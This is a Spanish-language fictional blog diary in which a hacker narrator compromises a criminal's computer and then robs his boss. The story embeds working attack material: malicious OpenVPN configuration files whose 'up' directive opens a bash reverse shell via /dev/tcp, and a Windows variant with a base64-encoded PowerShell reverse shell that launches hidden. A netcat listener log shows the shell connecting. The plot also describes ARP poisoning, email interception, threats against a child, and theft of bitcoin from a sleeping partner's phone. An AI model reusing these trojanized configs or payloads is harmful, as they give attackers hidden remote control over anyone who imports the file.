Viernes, 22 de Junio de 2018: Wiii, wiii, le parlevu frances

Querido Diario…

Ella era una fanática de ver películas en línea usando Netflix, y como toda usuaria promedio, contrataba servicios de VPN para poder salir con una dirección IP diferente y ver contenido de otros países. Cuando supe de ello montones de ideas se me vinieron a la cabeza.

La mayoría de las VPN’s se basan en servicios ofrecidos por OpenVPN, uno de los servicios de VPN más populares, que hasta yo lo uso.. coff.. coff.. aunque Isaac coff.. coff.. mis certificados siguen sin servir; pero supongo eso es parte de la seguridad 😛 darte un certificado inválido. Lo que bien es cierto es que para facilitar la conexión a este tipo de servicios por parte de personas que no saben mucho de modificar archivos de configuración; lo más sencillo es simplemente darles un archivo de configuración de OpenVPN listo para usarse, que incluso en OS X usando Tunnelblink es cosa de darle doble click y en automático queda todo configurado.

¿Eso es grave?… coff.. coff.. pues como dice Beto, “pues es que mire joven” 😛 [inserte aquí movimiento de manos contenante]

Los archivos de configuración en su forma más simple pueden ser así:

remote [IP remota]
ifconfig 10.200.0.2 10.200.0.1
dev tun

Hasta allí todo va bien. Te conectas a una dirección en internet, y esa te asigna un rango de forma interna. Y tú me dirás, ¿y eso qué o qué de qué o como?.

¿Qué pasa cuando te conectas a una VPN?, lo más básico, lo más sencillo… te da un mensaje de bienvenida. “Bienvenido… ahora puede descargar pornografía ilega… digo, torrents”. ¿Cómo es que se despliega ese mensaje?. Es una configuración dentro del mismo archivo de configuración para ejecutar una orden; ¿y qué más?.

Bueno, podríamos configurar cosas para que el equipo de alguien al conectarse haga algo, o prepare algo… como ¿una shell en reversa?

remote 192.168.1.245
ifconfig 10.200.0.2 10.200.0.1
dev tun
script-security 2
up “/bin/bash -c ‘/bin/bash -i > /dev/tcp/192.168.1.218/8181 0<&1 2>&1&’”

Obviamente esto sería en un servidor Linux, pero bueno, hackear Linux no es algo complicado. ¿Qué pasaría si es un servidor Windows? (siempre hay que estar preparado para todo), pues vale, con un poco de encodeo se puede resolver.

ifconfig 10.200.0.2 10.200.0.1
dev tun
remote 192.168.1.245
script-security 2
setenv z1 C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
setenv a1 ‘ZgB1AG4AYwB0AGkAbwBuACAAYwBsAGUAYQBuAHUAcAAgAHsADQAKAGkAZgAgACgAJABjAGwAaQBlAG4AdAAuAEMAbwBuAG4AZQBjAHQAZQBkACAALQBlAHEAIAAkAHQAcgB1AGUAKQAgAHsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkAfQANAAoAaQBmACAAKAAkAHAAcgBvAGMAZQBzAHMALgBFAHgAaQB0AEM’
setenv b1 ‘AbwBkAGUAIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAkAHAAcgBvAGMAZQBzAHMALgBDAGwAbwBzAGUAKAApAH0ADQAKAGUAeABpAHQAfQANAAoAJABhAGQAZAByAGUAcwBzACAAPQAgACcAMQA5ADIALgAxADYAOAAuADEALgAyADEAOAAnAA0ACgAkAHAAbwByAHQAIAA9ACAAJwA4ADEAOAAxACcADQAKACQAYwBsAG’
setenv c1 ‘kAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAHMAeQBzAHQAZQBtAC4AbgBlAHQALgBzAG8AYwBrAGUAdABzAC4AdABjAHAAYwBsAGkAZQBuAHQADQAKACQAYwBsAGkAZQBuAHQALgBjAG8AbgBuAGUAYwB0ACgAJABhAGQAZAByAGUAcwBzACwAJABwAG8AcgB0ACkADQAKACQAcwB0AHIAZQBhAG0AIAA9A’
setenv d1 ‘CAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQANAAoAJABuAGUAdAB3AG8AcgBrAGIAdQBmAGYAZQByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEIAeQB0AGUAWwBdACAAJABjAGwAaQBlAG4AdAAuAFIAZQBjAGUAaQB2AGUAQgB1AGYAZgBlAHIAUwBpAHoAZQAN’
setenv e1 ‘AAoAJABwAHIAbwBjAGUAcwBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMADQAKACQAcAByAG8AYwBlAHMAcwAuAFMAdABhAHIAdABJAG4AZgBvAC4ARgBpAGwAZQBOAGEAbQBlACAAPQAgACcAQwA6AFwAXAB3AGkAbgB’
setenv f1 ‘kAG8AdwBzAFwAXABzAHkAcwB0AGUAbQAzADIAXABcAGMAbQBkAC4AZQB4AGUAJwANAAoAJABwAHIAbwBjAGUAcwBzAC4AUwB0AGEAcgB0AEkAbgBmAG8ALgBSAGUAZABpAHIAZQBjAHQAUwB0AGEAbgBkAGEAcgBkAEkAbgBwAHUAdAAgAD0AIAAxAA0ACgAkAHAAcgBvAGMAZQBzAHMALgBTAHQAYQByAHQASQBuAGYAbw’
setenv g1 ‘AuAFIAZQBkAGkAcgBlAGMAdABTAHQAYQBuAGQAYQByAGQATwB1AHQAcAB1AHQAIAA9ACAAMQANAAoAJABwAHIAbwBjAGUAcwBzAC4AUwB0AGEAcgB0AEkAbgBmAG8ALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQAgAD0AIAAwAA0ACgAkAHAAcgBvAGMAZQBzAHMALgBTAHQAYQByAHQAKAApAA0ACgAkAGkAb’
setenv h1 ‘gBwAHUAdABzAHQAcgBlAGEAbQAgAD0AIAAkAHAAcgBvAGMAZQBzAHMALgBTAHQAYQBuAGQAYQByAGQASQBuAHAAdQB0AA0ACgAkAG8AdQB0AHAAdQB0AHMAdAByAGUAYQBtACAAPQAgACQAcAByAG8AYwBlAHMAcwAuAFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAANAAoAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAA’
setenv i1 ‘MQANAAoAJABlAG4AYwBvAGQAaQBuAGcAIAA9ACAAbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAcwBjAGkAaQBFAG4AYwBvAGQAaQBuAGcADQAKAHcAaABpAGwAZQAoACQAbwB1AHQAcAB1AHQAcwB0AHIAZQBhAG0ALgBQAGUAZQBrACgAKQAgAC0AbgBlACAALQAxACkAewAkAG8’
setenv j1 ‘AdQB0ACAAKwA9ACAAJABlAG4AYwBvAGQAaQBuAGcALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAbwB1AHQAcAB1AHQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAKQApAH0ADQAKACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAGUAbgBjAG8AZABpAG4AZwAuAEcAZQB0AEIAeQB0AGUAcwAoACQAbwB1AHQAKQAsAD’
setenv k1 ‘AALAAkAG8AdQB0AC4ATABlAG4AZwB0AGgAKQANAAoAJABvAHUAdAAgAD0AIAAkAG4AdQBsAGwAOwAgACQAZABvAG4AZQAgAD0AIAAkAGYAYQBsAHMAZQA7ACAAJAB0AGUAcwB0AGkAbgBnACAAPQAgADAAOwANAAoAdwBoAGkAbABlACAAKAAtAG4AbwB0ACAAJABkAG8AbgBlACkAIAB7AA0ACgBpAGYAIAAoACQAYwBsA’
setenv l1 ‘GkAZQBuAHQALgBDAG8AbgBuAGUAYwB0AGUAZAAgAC0AbgBlACAAJAB0AHIAdQBlACkAIAB7AGMAbABlAGEAbgB1AHAAfQANAAoAJABwAG8AcwAgAD0AIAAwADsAIAAkAGkAIAA9ACAAMQANAAoAdwBoAGkAbABlACAAKAAoACQAaQAgAC0AZwB0ACAAMAApACAALQBhAG4AZAAgACgAJABwAG8AcwAgAC0AbAB0ACAAJABu’
setenv m1 ‘AGUAdAB3AG8AcgBrAGIAdQBmAGYAZQByAC4ATABlAG4AZwB0AGgAKQApACAAewANAAoAJAByAGUAYQBkACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABuAGUAdAB3AG8AcgBrAGIAdQBmAGYAZQByACwAJABwAG8AcwAsACQAbgBlAHQAdwBvAHIAawBiAHUAZgBmAGUAcgAuAEwAZQBuAGcAdABoACAALQA’
setenv n1 ‘gACQAcABvAHMAKQANAAoAJABwAG8AcwArAD0AJAByAGUAYQBkADsAIABpAGYAIAAoACQAcABvAHMAIAAtAGEAbgBkACAAKAAkAG4AZQB0AHcAbwByAGsAYgB1AGYAZgBlAHIAWwAwAC4ALgAkACgAJABwAG8AcwAtADEAKQBdACAALQBjAG8AbgB0AGEAaQBuAHMAIAAxADAAKQApACAAewBiAHIAZQBhAGsAfQB9AA0ACg’
setenv o1 ‘BpAGYAIAAoACQAcABvAHMAIAAtAGcAdAAgADAAKQAgAHsADQAKACQAcwB0AHIAaQBuAGcAIAA9ACAAJABlAG4AYwBvAGQAaQBuAGcALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAbgBlAHQAdwBvAHIAawBiAHUAZgBmAGUAcgAsADAALAAkAHAAbwBzACkADQAKACQAaQBuAHAAdQB0AHMAdAByAGUAYQBtAC4AdwByAGkAd’
setenv p1 ‘ABlACgAJABzAHQAcgBpAG4AZwApAA0ACgBzAHQAYQByAHQALQBzAGwAZQBlAHAAIAAxAA0ACgBpAGYAIAAoACQAcAByAG8AYwBlAHMAcwAuAEUAeABpAHQAQwBvAGQAZQAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AGMAbABlAGEAbgB1AHAAfQANAAoAZQBsAHMAZQAgAHsADQAKACQAbwB1AHQAIAA9ACAAJABlAG4A’
setenv q1 ‘YwBvAGQAaQBuAGcALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAbwB1AHQAcAB1AHQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAKQApAA0ACgB3AGgAaQBsAGUAKAAkAG8AdQB0AHAAdQB0AHMAdAByAGUAYQBtAC4AUABlAGUAawAoACkAIAAtAG4AZQAgAC0AMQApAHsADQAKACQAbwB1AHQAIAArAD0AIAAkAGUAbgBjAG8’
setenv r1 ‘AZABpAG4AZwAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABvAHUAdABwAHUAdABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAApACkAOwAgAGkAZgAgACgAJABvAHUAdAAgAC0AZQBxACAAJABzAHQAcgBpAG4AZwApACAAewAkAG8AdQB0ACAAPQAgACcAJwB9AH0ADQAKACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAG’
setenv s1 ‘UAbgBjAG8AZABpAG4AZwAuAEcAZQB0AEIAeQB0AGUAcwAoACQAbwB1AHQAKQAsADAALAAkAG8AdQB0AC4AbABlAG4AZwB0AGgAKQANAAoAJABvAHUAdAAgAD0AIAAkAG4AdQBsAGwADQAKACQAcwB0AHIAaQBuAGcAIAA9ACAAJABuAHUAbABsAH0AfQAgAGUAbABzAGUAIAB7AGMAbABlAGEAbgB1AHAAfQB9AA==’
up ‘C:\\Windows\\System32\\cmd.exe /c (start %z1% -WindowStyle Hidden -EncodedCommand %a1%%b1%%c1%%d1%%e1%%f1%%g1%%h1%%i1%%j1%%k1%%l1%%m1%%n1%%o1%%p1%%q1%%r1%%s1% ) ||’

Querido Diario.. te pido perdón, pero Power Shell no es algo de lo que yo entienda mucho. Y ya que tenemos esto, estamos listos para poder realizar nuestro ataque. Ahora lo que necesitaba era hacerle llegar al “famoso” Cesar este archivo de configuración para tener acceso a sus archivos.

Empecé a analizar el comportamiento de Cesar siguiendo su celular, a través de unos mensajes que le había enviado y localizando las células en las que se conectaba su celular. Fue entonces que caí en cuenta de que constantemente se conectaba desde el iHop de Patio Universidad, ¿por qué?.. pues parece que a pesar de que es el súper lugar teniente de una mujer loca, turbia e ilegal y adinerada; no tiene suficiente dinero para comprar un plan de datos ilimitado y se anda conectado a la red del iHop.

Diablos, pensé… si hubiese sabido eso simplemente habría puesto una Pineapple y me habría ahorrado todo el show, pero en fin. Yo soy el gran vendetta, tengo que hacer algo de espectáculo para mantener entretenidos a los lectores de este H. blog. Así qué continue con mi plan inicial. Me senté conecté a la red de iHop. Una vez dentro escaneé los equipos que estaban conectados a la red para encontrar al de Cesar.

# nmap -vv -sV -O -Pn 192.169.254.0-254

No habíamos muchas personas conectadas a la red, probablemente los empleados y Cesar, ¿quién va a un iHop a cenar?. Ya dentro lo que hice fue confiar en el banner grabbing que me dio que había un Samsung S9 conectado; un teléfono bastante costoso que seguro puede pagar un lugarteniente de la mafia; y coff.. coff.. ¿Android?, pues si… es un lugarteniente chafa, ¿qué se podía esperar de alguien así? 😛

Ya que lo había identificado le lance un ARP poisoning, pero con el mero propósito de que le fallase la red, lo único que quería es que se pudiese en contacto con el proveedor de VPN. Y una vez que falló entonces mandó un correo electrónico para soporte técnico, al parecer no podía ver la Casa de Papel, lo cual me causo gracia; parece que Cesar es un fanático de otro tipo de criminales.

Cuando envío el correo lo intercepté y modifiqué con mi archivo de configuración de OpenVPN; él lo descargó y ejecutó desde su computadora, y en ese momento coff.. coff..

albinolobster@ubuntu:~$ nc -lvp 8181
Listening on [0.0.0.0] (family 0, port 8181)
Connection from [192.168.1.226] port 8181 [tcp/*] accepted (family 2, sport 51082)
Microsoft Windows [Version 10.0.17134.48]
© 2018 Microsoft Corporation. All rights reserved.
C:\Users\albinolobster\OpenVPN\config\albino_lobster>whoami
desktop-r5u6pvd\albinolobster
C:\Users\albinolobster\OpenVPN\config\albino_lobster>

Mientras el estuvo conectado viendo la serie, y comiendo pan francés con fresas; yo descargué toda su información. Incluyendo las direcciones y relaciones de las casas de seguridad. Entonces, sólo faltaba hacerle una visita.

Caminamos sobre la calle a donde estaría la casa de seguridad más importante, vimos le Civic de Cesar estacionarse; como buen lugarteniente no traía guardaespaldas, apenas bajo y Beto le puso el arma en la cabeza.

- ¿Qué chin&/() - nos miró con odio y sorpresa
- Shhhh... - lo calló Beto - abre
- Estas loco, no te voy a abrir nada, dispara si tienes hue%&/
- Nah - interrumpí, no nos gusta matar sin sentido; somos civilizados... abre
- Tú ya estas muerto; ella te va a matar 
- ¿En serio?... ojalá, pero ... Cesarin, abre
- Nunca
- Ok, quieres ponerte rudo - saqué mi celular y simule que marcaba por teléfono - ¡Janey!, no quiere cooperar, es tiempo que le hagas un agujero a la pierna de Sonia

Sonia era la hija de Cesar. Regla número #43 de los negocios turbios e ilegales; todos tenemos un punto débil. En ese momento el semblante de Cesar cambió y empezó a llorar.

- No, déjala... ten honor
- Yo tengo mucho honor, pero mi amiga Janey no creo
- ¿Qué quieres?, entrar... no hay mucho; te va a matar después de eso... y a mi
- Y a Sonia... 
- Ella no sabe de Sonia
- ¿Cómo se lo ocutaste?
- Lleva años que no la veo, pero...
- Pero la extrañas y ves sus fotografías de instagram desde tu computadora
- Si
- Hum... ella no me importa; pero necesito algo para librarme de ella; y mantenerla alineada. Dame algo
- Vacía sus cuentas; ella sin dinero no es nada
- ¿Bitcoins?
- Si

Le hice una seña a Beto para que lo dejase…

- ¿Qué harás? - me preguntó
- Toma todo lo que hay en esa casa de seguridad y llévate a Sonia lejos de aquí
- Pero... 
- Se acabó Cesarín, después de lo que voy a hacer te va a querer matar. Huye mientras puedas.

Le mandé un mensaje y esperé a verle.

- Hola amor
- Hola
- Que milagro
- Te extraño amorcito - dije con un tono sarcastico
- Hum... yo también; ven a mi casa
- Vale

Maneje sobre todo Circuito Interior; está vez me sentía mucho más seguro, aunque muy hombrezuelo por lo que iba a hacer. Aparque fuera de su enorme casa.

- Hola bebe
- Hola - y fue directo a lo que quería

[Inserte aquí mensaje de censurado +18]

Se había quedado dormida… y entonces me acerqué a su celular. Ya me había aprendido el patrón de desbloqueo de su celular, entre a Bitso y en efecto, tenía activado el reconocimiento de rostro. Hice una transacción por $3000 bitcoins hacia la wallet de Mom.

Me vestí, y ella se despertó.

- No te he ordenado de que te vayas
- Lo siento, se me hace un poco tarde
- ¿Tarde para que?
- Debo ir a mi casa, mi perro no duerme si no llego
- Vuelve a la cama y hazme eso que es lo único para lo que sirves
- Lo siento, pero.. creo que ya no te tengo mucho miedo
- ¿Qué? - y empezó a gritar - ¡Cesar! . miro a todos lados y no apareció
- Lo siento, no eres tú, soy y.... no, si eres tú, son tus lonjas - y me salí de la habitación

Salió gritando ordenando que me detuviesen, pero al llegar a la primer puerta le mostré el celular con la aplicación de Bitso abierta y les dije:

- Se acabó, no tiene dinero para pagarles; y si me hacen algo en unos minutos llegarán tipos turbios e ilegales a sacarme vivo de aquí

Y entonces se hicieron a un lado.

Una semana más tarde estaba sentado frente al Sena, comiendo un macaroon the early grey, con pedacitos de hoja, delicioso.

- Entonces, volvimos a donde empezamos
- Si, pero... al menos ahora nuestra fama aumentó 
- Mala fama
- Fama es fama, no existe la mala fama
- Pásame tu wallet
- No, déjalo
- Negocios son negocios
- Exacto, nuestro acuerdo es te sirvo a cambio de vivir en Mexicali; eso no incluye extras
- Los has ganado
- Sólo hago mi trabajo
- Bien - llamó con a mano al mesero - ¿qué prefieres, un lambrusco?
- Nah, estamos en Francia... no en Italia; ¿tiene algo de Provenza?
- Oui monsieur, mais le coût... - Mom interrumpió
- Dijo Provenza, no preguntó cuanto cuesta... y nos trae otra canasta de macaroones. 
- Oui monsieur

Terminando regresé al hotel… que lujoso, pensé.

- Hola terrorista cibernético
- Hola Chun-lee
- Haha, ¿por? - le envié la foto que le tomé el día que comimos
- Te pasas ... ¿ya comiste quesos añejados y vinos?
- Vino.. y macaroones; ¿te gustó el concierto?
- Si, mucho... ¿ya tienes un nuevo empleo que no sea turbio ni ilegal?
- Aun no me ofertan, hasta mañana
- ¿Aceptaras?

 

Querido Diario…

“Quiero verte una vez más”…

Marcar el Enlace permanente.

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *